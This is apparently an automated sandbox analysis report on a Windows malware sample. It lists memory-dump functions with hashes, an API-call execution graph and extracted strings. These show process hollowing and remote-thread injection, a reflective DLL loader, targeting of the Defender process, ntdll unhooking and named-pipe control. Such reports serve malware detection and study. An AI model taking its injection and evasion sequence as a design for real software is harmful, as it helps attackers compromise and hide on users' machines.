                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction ID: 68f6b240d09a4260ed46950b8f3246e43bb54358201e6f6be1ed807fad0fc897
                                                          • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction Fuzzy Hash: B111C031B02BA481EB08CBA6A45829D67B0FB99FC4F584026EE6D93735DF38C4828300
                                                          Function 000001D29E8C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction ID: fc0b5895a8af778e0727726985035f15786a54d42cb3d98f322a79c5f6f51cb5
                                                          • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction Fuzzy Hash: F7E06DB160261486EB088FA2D82C38DB7F1FF98F0AF44C024C92907361DF7D84D99740
                                                          Function 000001D29E8C1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction ID: ef8c2f1ccf7478dc89855662bafe8fe2202e80e747ed3ba01202cbb3ad01aa9a
                                                          • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction Fuzzy Hash: C3E0EDB161255486EB089BA2D81829DB7B1FF98B1AF448025C92907325DE3884D99610

                                                          Executed Functions

                                                          Function 00007FF6931B1140 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.2208381080.00007FF6931B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6931B0000, based on PE: true
                                                          • Associated: 00000025.00000002.2208339786.00007FF6931B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000025.00000002.2208420348.00007FF6931C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000025.00000002.2208452028.00007FF6931CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000025.00000002.2208745898.00007FF693449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000025.00000002.2209078712.00007FF6936C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000025.00000002.2209188427.00007FF6936FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000025.00000002.2209285290.00007FF6936FF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_7ff6931b0000_updater.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction ID: e2deca9108ee35f50872e246185b759c1399870366ac86f0bb851a426d63dc4a
                                                          • Opcode Fuzzy Hash: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction Fuzzy Hash: 5CB01230D0430984E7142F11D8833583278EB08740F410471D40C67372CEBD54504B10

                                                          Execution Graph

                                                          Execution Coverage:41.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:47.4%
                                                          Total number of Nodes:247
                                                          Total number of Limit Nodes:29
                                                          execution_graph 529 140002cb8 530 140002cc5 529->530 532 140002ce5 ConnectNamedPipe 530->532 533 140002cda Sleep 530->533 538 140002300 AllocateAndInitializeSid 530->538 534 140002cf4 ReadFile 532->534 535 140002d29 Sleep 532->535 533->530 536 140002d34 DisconnectNamedPipe 534->536 537 140002d17 534->537 535->536 536->532 537->536 539 14000235d SetEntriesInAclW 538->539 541 14000241b 538->541 540 1400023a1 LocalAlloc 539->540 539->541 540->541 542 1400023b5 InitializeSecurityDescriptor 540->542 541->530 542->541 543 1400023c5 SetSecurityDescriptorDacl 542->543 543->541 544 1400023dc CreateNamedPipeW 543->544 544->541 690 1400031d8 691 1400033f1 690->691 692 1400031ff 690->692 695 14000356d ReadFile 691->695 696 1400033fd 691->696 693 140003205 692->693 694 14000335f GetProcessHeap HeapAlloc K32EnumProcesses 692->694 697 140003211 693->697 698 140003356 ExitProcess 693->698 711 14000329d 694->711 717 14000339d 694->717 699 140003597 695->699 695->711 700 140003563 696->700 701 140003406 696->701 703 14000321a 697->703 704 1400032be RegOpenKeyExW 697->704 705 1400035a4 GetProcessHeap HeapAlloc 699->705 699->711 702 140001f7c 22 API calls 700->702 706 140003412 701->706 707 140003508 701->707 702->711 703->711 722 140003234 ReadFile 703->722 708 140003327 704->708 709 1400032eb RegDeleteValueW RegDeleteValueW RegDeleteValueW 704->709 712 140001cf0 13 API calls 705->712 713 140003454 706->713 714 140003417 706->714 715 1400020fc ReadFile 707->715 750 14000217c SysAllocString SysAllocString CoInitializeEx 708->750 709->708 710 140001860 31 API calls 710->717 732 1400035dd 712->732 766 1400020fc 713->766 714->711 763 140002c64 714->763 719 140003517 715->719 717->710 717->711 719->711 729 1400020fc ReadFile 719->729 721 140003333 726 14000217c 9 API calls 721->726 722->711 727 14000325e 722->727 723 140003612 GetProcessHeap HeapFree 723->711 725 14000346b ReadFile 725->711 730 140003493 725->730 731 14000333f 726->731 727->711 737 140001860 31 API calls 727->737 734 14000352e 729->734 730->711 735 1400034a0 GetProcessHeap HeapAlloc ReadFile 730->735 758 140001f7c GetProcessHeap HeapAlloc 731->758 732->723 798 140001eec 732->798 734->711 739 140003536 ShellExecuteW 734->739 735->723 740 1400034e4 735->740 742 140003284 737->742 739->711 740->723 770 140002434 740->770 745 140001860 31 API calls 742->745 745->711 751 1400022d8 SysFreeString SysFreeString 750->751 752 1400021bd CoInitializeSecurity 750->752 751->721 753 140002205 CoCreateInstance 752->753 754 1400021f9 752->754 755 1400022d2 CoUninitialize 753->755 756 140002234 VariantInit 753->756 754->753 754->755 755->751 757 14000228a 756->757 757->755 759 140001cf0 13 API calls 758->759 761 140001fba 759->761 760 140001fe8 GetProcessHeap HeapFree 761->760 762 140001eec 5 API calls 761->762 762->761 764 1400020cc 2 API calls 763->764 765 140002c79 764->765 767 140002120 ReadFile 766->767 768 140002143 767->768 769 14000215d 767->769 768->767 768->769 769->711 769->725 771 14000246b 770->771 795 14000291b 770->795 773 1400020cc 2 API calls 771->773 793 1400024ab 771->793 771->795 772 1400024de CreateProcessW 772->793 773->793 774 1400028e1 OpenProcess 775 1400028f4 TerminateProcess 774->775 774->793 775->793 776 1400020cc GetModuleHandleA GetProcAddress 776->793 777 14000272c VirtualAllocEx 779 14000275b WriteProcessMemory 777->779 777->793 778 140002572 VirtualAllocEx 780 1400025a1 WriteProcessMemory 778->780 778->793 781 14000277d VirtualProtectEx 779->781 779->793 782 1400025c3 VirtualProtectEx 780->782 780->793 781->793 782->793 783 14000268c VirtualAlloc 787 1400026b1 GetThreadContext 783->787 783->793 784 140002846 VirtualAlloc 788 140002867 Wow64GetThreadContext 784->788 784->793 785 140002604 WriteProcessMemory 785->793 786 1400027be WriteProcessMemory 786->793 790 1400026ce WriteProcessMemory 787->790 787->793 789 14000287f WriteProcessMemory 788->789 788->793 791 1400028a3 Wow64SetThreadContext 789->791 789->793 792 1400026f8 SetThreadContext 790->792 790->793 791->793 792->793 793->772 793->774 793->776 793->777 793->778 793->783 793->784 793->785 793->786 794 1400028c1 ResumeThread 793->794 793->795 796 14000264e VirtualProtectEx 793->796 797 140002808 VirtualProtectEx 793->797 794->793 794->795 795->723 796->793 797->793 799 140001f65 798->799 800 140001f0b OpenProcess 798->800 799->723 800->799 801 140001f23 800->801 802 140002c04 2 API calls 801->802 803 140001f43 802->803 804 140001f5c CloseHandle 803->804 805 140001f51 CloseHandle 803->805 804->799 805->804 545 1400036fc 546 140003709 545->546 547 140002300 6 API calls 546->547 548 140003729 ConnectNamedPipe 546->548 549 14000371e Sleep 546->549 547->546 550 140003787 Sleep 548->550 551 140003738 ReadFile 548->551 549->546 552 140003792 DisconnectNamedPipe 550->552 551->552 553 14000375b WriteFile 551->553 552->548 553->552 555 14000363c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 556 140003692 K32EnumProcesses 555->556 557 1400036ef Sleep 556->557 559 1400036a7 556->559 557->556 558 1400036e0 558->557 559->558 561 140003198 559->561 562 1400031d1 561->562 563 1400031a9 561->563 562->559 567 140001860 OpenProcess 563->567 566 140001860 31 API calls 566->562 568 1400018a8 IsWow64Process 567->568 569 140001cd0 567->569 570 1400018bf CloseHandle 568->570 569->566 570->569 572 1400018e5 570->572 572->569 573 140001927 OpenProcess 572->573 573->569 574 140001943 OpenProcess 573->574 575 14000195e K32GetModuleFileNameExW 574->575 576 1400019b0 574->576 578 1400019a7 CloseHandle 575->578 579 140001977 PathFindFileNameW lstrlenW 575->579 577 140001a03 NtQueryInformationProcess 576->577 581 1400019df StrCmpIW 576->581 582 140001cc7 CloseHandle 577->582 583 140001a28 577->583 578->576 579->578 580 140001994 StrCpyW 579->580 580->578 581->576 581->582 582->569 583->582 584 140001a32 OpenProcessToken 583->584 584->582 585 140001a50 GetTokenInformation 584->585 586 140001af3 585->586 587 140001a78 GetLastError 585->587 588 140001afa CloseHandle 586->588 587->586 589 140001a83 LocalAlloc 587->589 588->582 594 140001b0e 588->594 589->586 590 140001a99 GetTokenInformation 589->590 591 140001ae1 590->591 592 140001ac1 GetSidSubAuthorityCount GetSidSubAuthority 590->592 593 140001ae8 LocalFree 591->593 592->593 593->588 594->582 595 140001b9d StrStrA 594->595 596 140001bc6 594->596 595->594 597 140001bcb 595->597 596->582 597->582 598 140001bf7 VirtualAllocEx 597->598 598->582 599 140001c26 WriteProcessMemory 598->599 599->582 600 140001c45 599->600 608 140002c04 600->608 602 140001c65 602->582 603 140001c73 WaitForSingleObject 602->603 604 140001c82 GetExitCodeThread 603->604 605 140001cbc CloseHandle 603->605 606 140001ca1 VirtualFreeEx 604->606 607 140001c98 604->607 605->582 606->605 607->606 611 1400020cc GetModuleHandleA 608->611 612 1400020f5 611->612 613 1400020ec GetProcAddress 611->613 613->612 614 140002d40 617 140002d54 614->617 662 140002a14 617->662 620 140002a14 14 API calls 621 140002d7c GetCurrentProcessId OpenProcess 620->621 622 140002d9c OpenProcessToken 621->622 623 140002e0e RegOpenKeyExW 621->623 626 140002e05 CloseHandle 622->626 627 140002db0 LookupPrivilegeValueW 622->627 624 140002d49 ExitProcess 623->624 625 140002e3f RegQueryValueExW 623->625 625->624 628 140002e6f RegQueryValueExW 625->628 626->623 627->626 629 140002dc7 AdjustTokenPrivileges 627->629 628->624 631 140002e9f GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 628->631 629->626 630 140002dff GetLastError 629->630 630->626 631->624 632 140002f11 RegQueryValueExW 631->632 632->624 633 140002f41 RegCloseKey GetCurrentProcessId 632->633 676 14000200c GetProcessHeap HeapAlloc 633->676 635 140002f58 RegCreateKeyExW 636 140003052 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 635->636 637 140002f95 ConvertStringSecurityDescriptorToSecurityDescriptorW 635->637 638 140001514 50 API calls 636->638 639 140002fd7 RegCreateKeyExW 637->639 640 140002fbd RegSetKeySecurity LocalFree 637->640 641 1400030dc 638->641 642 140003011 GetCurrentProcessId RegSetValueExW RegCloseKey 639->642 643 140003048 RegCloseKey 639->643 640->639 644 1400030e8 ShellExecuteW 641->644 645 14000311a 641->645 642->643 643->636 644->644 644->645 646 14000148c 6 API calls 645->646 647 140003122 646->647 648 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 647->648 649 14000312b 648->649 650 14000148c 6 API calls 649->650 651 140003134 650->651 652 14000148c 6 API calls 651->652 653 14000313d 652->653 654 14000148c 6 API calls 653->654 655 140003146 654->655 656 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 655->656 657 14000314f 656->657 658 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 657->658 659 140003158 658->659 660 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 659->660 661 140003161 GetProcessHeap HeapFree SleepEx 660->661 661->624 663 140002be7 662->663 664 140002a1d StrCpyW StrCatW GetModuleHandleW 662->664 663->620 664->663 665 140002a6e GetCurrentProcess K32GetModuleInformation 664->665 666 140002bde FreeLibrary 665->666 667 140002a9e CreateFileW 665->667 666->663 667->666 668 140002ad3 CreateFileMappingW 667->668 669 140002bd5 CloseHandle 668->669 670 140002afc MapViewOfFile 668->670 669->666 671 140002bcc CloseHandle 670->671 672 140002b1f 670->672 671->669 672->671 673 140002b38 lstrcmpiA 672->673 675 140002b76 672->675 673->672 674 140002b78 VirtualProtect VirtualProtect 673->674 674->671 675->671 682 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 676->682 678 1400020a5 GetProcessHeap HeapFree 679 140002050 679->678 680 140002071 OpenProcess 679->680 680->679 681 140002087 TerminateProcess CloseHandle 680->681 681->679 683 140001d7d 682->683 684 140001e4f GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 682->684 683->684 685 140001d92 OpenProcess 683->685 687 140001e3a CloseHandle 683->687 688 140001de9 ReadProcessMemory 683->688 684->679 685->683 686 140001daf K32EnumProcessModulesEx 685->686 686->683 686->687 687->683 689 140001e0b 688->689 689->683 689->687 689->688

                                                          Callgraph

                                                          Executed Functions

                                                          Function 0000000140002D54 Relevance: 84.3, APIs: 36, Strings: 12, Instructions: 258registrymemorythreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                          • String ID: ?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\dialerconfig$SeDebugPrivilege$dialerdll32$dialerdll64$kernel32.dll$ntdll.dll$open$pid$svc64
                                                          • API String ID: 3658652915-98388624
                                                          • Opcode ID: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                          • Instruction ID: 64b8ffd44a99f3ce8fcd0b7b346b5b7659867d38c7c320bcd7049fd2825a730f
                                                          • Opcode Fuzzy Hash: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                          • Instruction Fuzzy Hash: C6C1F2F2200A4186EB26DF22F8547DA37A5F78CBD9F814116BB4A43A75DF38C589C744
                                                          Function 0000000140001860 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289memorystringnativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 45 140001860-1400018a2 OpenProcess 46 1400018a8-1400018bd IsWow64Process 45->46 47 140001cd0-140001cec 45->47 48 1400018cd 46->48 49 1400018bf-1400018cb 46->49 50 1400018d3-1400018df CloseHandle 48->50 49->50 50->47 51 1400018e5-1400018f0 50->51 51->47 52 1400018f6-14000190b 51->52 53 14000191d 52->53 54 14000190d-140001912 52->54 56 14000191f-140001921 53->56 54->47 55 140001918-14000191b 54->55 55->56 56->47 57 140001927-14000193d OpenProcess 56->57 57->47 58 140001943-14000195c OpenProcess 57->58 59 14000195e-140001975 K32GetModuleFileNameExW 58->59 60 1400019b0-1400019b3 58->60 63 1400019a7-1400019aa CloseHandle 59->63 64 140001977-140001992 PathFindFileNameW lstrlenW 59->64 61 140001a03-140001a22 NtQueryInformationProcess 60->61 62 1400019b5-1400019db 60->62 67 140001cc7-140001cca CloseHandle 61->67 68 140001a28-140001a2c 61->68 66 1400019df-1400019f1 StrCmpIW 62->66 63->60 64->63 65 140001994-1400019a4 StrCpyW 64->65 65->63 66->67 69 1400019f7-140001a01 66->69 67->47 68->67 70 140001a32-140001a4a OpenProcessToken 68->70 69->61 69->66 70->67 71 140001a50-140001a76 GetTokenInformation 70->71 72 140001af3 71->72 73 140001a78-140001a81 GetLastError 71->73 74 140001afa-140001b08 CloseHandle 72->74 73->72 75 140001a83-140001a97 LocalAlloc 73->75 74->67 76 140001b0e-140001b15 74->76 75->72 77 140001a99-140001abf GetTokenInformation 75->77 76->67 78 140001b1b-140001b26 76->78 79 140001ae1 77->79 80 140001ac1-140001adf GetSidSubAuthorityCount GetSidSubAuthority 77->80 78->67 81 140001b2c-140001b36 78->81 82 140001ae8-140001af1 LocalFree 79->82 80->82 83 140001b51 81->83 84 140001b38-140001b42 81->84 82->74 86 140001b55-140001b8d call 1400029ac * 3 83->86 84->67 85 140001b48-140001b4f 84->85 85->86 86->67 93 140001b93-140001bb2 call 1400029ac StrStrA 86->93 96 140001bb4-140001bc4 93->96 97 140001bcb-140001bf1 call 1400029ac * 2 93->97 96->93 98 140001bc6 96->98 97->67 103 140001bf7-140001c20 VirtualAllocEx 97->103 98->67 103->67 104 140001c26-140001c3f WriteProcessMemory 103->104 104->67 105 140001c45-140001c67 call 140002c04 104->105 105->67 108 140001c69-140001c71 105->108 108->67 109 140001c73-140001c80 WaitForSingleObject 108->109 110 140001c82-140001c96 GetExitCodeThread 109->110 111 140001cbc-140001cc1 CloseHandle 109->111 112 140001ca1-140001cba VirtualFreeEx 110->112 113 140001c98-140001c9e 110->113 111->67 112->111 113->112
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain$dialer.exe
                                                          • API String ID: 2456419452-213581914
                                                          • Opcode ID: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                          • Instruction ID: c88bb7c69995235f0751d37bc2d3b37891dd0b76cd64fd565fb581fb6c90924f
                                                          • Opcode Fuzzy Hash: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                          • Instruction Fuzzy Hash: 66C14BF170064186EB66DF23B8807EA37A1FB89BC4F444129EB4A47BA4DF38C985C744
                                                          Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                          • String ID:
                                                          • API String ID: 4084875642-0
                                                          • Opcode ID: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                          • Instruction ID: 28fb11b33fc6f94ec1b72d6715988f9935dfd05350da2d8862b8b96723d9be5a
                                                          • Opcode Fuzzy Hash: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                          • Instruction Fuzzy Hash: 145169B27116808AEB66DF63F8587EA26A1F78DBD4F404029EF4947764DF38C586C704
                                                          Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                          • String ID:
                                                          • API String ID: 3197395349-0
                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
                                                          Function 0000000140002A14 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                          • String ID: .text$C:\Windows\System32\
                                                          • API String ID: 2721474350-832442975
                                                          • Opcode ID: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                          • Instruction ID: dfe9efa62791befa50248ca661271f48b6fe4723356168206a8c879346357553
                                                          • Opcode Fuzzy Hash: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                          • Instruction Fuzzy Hash: 29516AB230468086EB22DF12F8587DAB3A1FB8CBD5F444215AF4A03BA8DF38C549C704
                                                          Function 00000001400036FC Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                          • String ID: M$\\.\pipe\dialerchildproc
                                                          • API String ID: 2203880229-1753684470
                                                          • Opcode ID: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                          • Instruction ID: c448ab6558bdd7463f57c5c12a5a219c56a73407a56f172addbd9e8e0ddff9c1
                                                          • Opcode Fuzzy Hash: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                          • Instruction Fuzzy Hash: 1C1139F121868492E726EB22F8047EA6764B78DBE0F444225FB9A436F6DF7CC548C704
                                                          Function 0000000140002CB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 157 140002cb8-140002cc2 158 140002cc5-140002cd8 call 140002300 157->158 161 140002ce5-140002cf2 ConnectNamedPipe 158->161 162 140002cda-140002ce3 Sleep 158->162 163 140002cf4-140002d15 ReadFile 161->163 164 140002d29-140002d2e Sleep 161->164 162->158 165 140002d34-140002d3d DisconnectNamedPipe 163->165 166 140002d17-140002d1c 163->166 164->165 165->161 166->165 167 140002d1e-140002d27 166->167 167->165
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
